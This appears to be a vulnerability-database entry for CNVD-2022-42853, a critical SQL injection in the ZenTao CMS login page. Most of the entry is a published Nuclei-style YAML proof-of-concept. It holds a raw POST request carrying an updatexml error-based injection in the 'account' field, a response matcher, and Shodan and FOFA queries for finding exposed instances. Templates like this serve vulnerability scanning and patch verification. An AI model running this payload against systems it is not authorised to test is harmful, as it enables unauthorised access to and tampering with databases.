CNVD-2022-42853: ZenTao CMS - SQL Injection

日期: 2025-08-01 | 影响软件: ZenTao CMS | POC: 已公开

漏洞描述

Zen Tao has a SQL injection vulnerability. Attackers can exploit the vulnerability to obtain sensitive database information.

PoC代码[已公开]

id: CNVD-2022-42853

info:
  name: ZenTao CMS - SQL Injection
  author: ling
  severity: critical
  description: |
    ZenTao CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
    cpe: cpe:2.3:a:easycorp:zentao:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"zentao"
    fofa-query: "Zentao"
    product: zentao
    vendor: easycorp
  tags: cnvd,cnvd2022,zentao,sqli,vuln
variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /zentao/user-login.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}/zentao/user-login.html

        account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1

    matchers:
      - type: word
        part: body
        words:
          - 'c8c605999f3d8352d7bb792cf3fdb25'
# digest: 490a0046304402202b8684a23c291483bfcc1de11a37c0c25a89aa5241c00d097d1bcccc60da44e4022030982064c6e065d8c671e6f28ca1d2d17237a134a9b5124d2d930d37a8ec7094:922c64590222798bb761d5b6d8e72950